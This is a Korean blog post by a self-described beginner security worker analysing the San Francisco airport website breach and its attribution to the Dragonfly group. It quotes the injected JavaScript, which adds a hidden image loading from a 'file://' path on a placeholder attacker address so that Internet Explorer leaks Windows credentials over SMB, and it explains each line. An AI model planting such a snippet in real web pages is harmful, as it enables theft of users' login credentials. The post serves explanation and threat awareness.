안녕하세요. 돗개예요. 이번 포스팅은 IT 이슈에 대해 작성해보려고 합니다. 아무래도 티스토리는 전문적인 글들이 블로그를 고품질로 만들어 주고 또한 조회수가 증가할 것으로 판단되어 IT 분야에서 일하고 있는 저도 부족하지만 국내외 IT 이슈를 바탕으로 분석하여 포스팅하려고 합니다. 저처럼 보안 쪽으로 일하시는 분들은 일간 혹은 주간으로 보안 이슈를 보고서로 제출하실 텐데 제 포스팅이 큰 도움이 되었으면 합니다. 저 또한 알아보고 공부하여 더욱 고품질의 포스팅을 만들도록 하겠습니다.
보안뉴스(https://www.boannews.com)에 따르면 최근 센프란시스코 공항 해킹이 발생했었다고 합니다. 공항 측에서 악성 코드를 분석한 결과 외부 네트워크로부터, 윈도 기반 장비에 탑재된 인터넷 익스플로러 브라우저를 통해 접속한 사용자들만 영향을 받았으며, 공항에서 제공하는 두 개의 홈페이지를 임시 폐쇄 코드 제거 작업을 하였다고 합니다.
일부 보안 전문가들은 이번 공격이 메이지카트(Magecart)의 수법과 닮았다고 주장했는데요. 메이지카트는 유명한 해킹 집단으로
- 2018 1월, 티켓마스터(영국 티켓 판매 회사)
- 2018 8월, 브리티시 에어웨이(영국 항공사)
- 2018년 9월 뉴에그(전자 제품 소매업체)
이 외에도 많은 사례가 존재합니다. 메이지카트는 자바스크립트 변조를 통해 공격하는 기법을 사용한다고 합니다. 하지만 이셋(보안전문업체) 측은 윈도우 로그인 크리덴셜을 노리는 공격이며, 지불 카드 정보를 노리는 메이지카트와 근본적으로 다르다고 반박했습니다.
※ 크리덴셜 스터핑 : 보통 네이버, 다음 등 로그인에 필요한 사용자 인증정보를 확보한 상태로 무작위로 다른 계정에도 삽입 공격
이셋 측은 메이지카트가 아닌 러시아의 APT 그룹인 드래곤플라이를 지목하였습니다. 2010년부터 활동 해온 그룹이라고 밝혔습니다. 주로 미국과 유럽의 에너지 산업을 노려왔으며 최근 발견된 공항 웹사이트 침해 사건은 드래곤플라이가 평소 사용해오던 공격 기법과 여러 가지 면에서 유사하다고 했습니다. 윈도우 크리덴셜을 노렸다는 것도 이유이지만 SMB 기능을 익스플로잇 했다는 것, file://이라는 프리픽스도 악용된 것으로 보아 드래곤플라이를 암시한다는 증거가 된다고 했습니다.
<1--//--><![CDATA[//><!--
bL = document.getElementsByTagName("body");
el = document.createElement("img");
el.style.width = "1";
el.style.height = "1";
el.style.visibility = "hidden";
el.src = "file://X.X.X.X/icon.png";
bL[0].appendchild(el);
//--><!]]><이셋이 제공한 문제의 소스코드(JavaScript)>
- document.getElementsByTagName("body") -> html의 body tag의 정보 추출
- document.createElement("img") -> 추출한 공격지 웹페이지에 img 요소 추가
- el.src = "file://x.x.x.x/icon.png"; -> 생성된 img에 공격자 원격 서버 아이피 삽입 (아마도 C&C 서버)
- Appendchild(el) -> bL [0] 테이블 생성 body tag에 자식 요소 추가, 위 소스를 실직적으로 삽입
즉, 웹페이지 html body tag에 img tag를 삽입하여 'file://' 경로를 사용하여 C&C 서버로부터 이미지를 로딩하도록 유도하고, 익스플로러의 SMB를 사용하여 로그인 정보를 탈취한 것으로 보입니다. 오래된 익스플로러 중 오래된 버전들의 취약점을 이용한 것입니다.
정말 짧고 간단한 소스코드를 삽입하여 많은 계정 정보를 탈취했습니다. 아무래도 저는 보안 분석 쪽이 아니다 보니 소스를 잘못 분석했을 가능성이 크고 추측으로 작성한 것이니 참고 정도로만 봐주시면 좋을 것 같습니다. 분석 공부를 슬슬 하고 있는 보린이 입니다. 더욱 좋은 품질의 분석을 위해 노력하겠습니다.
댓글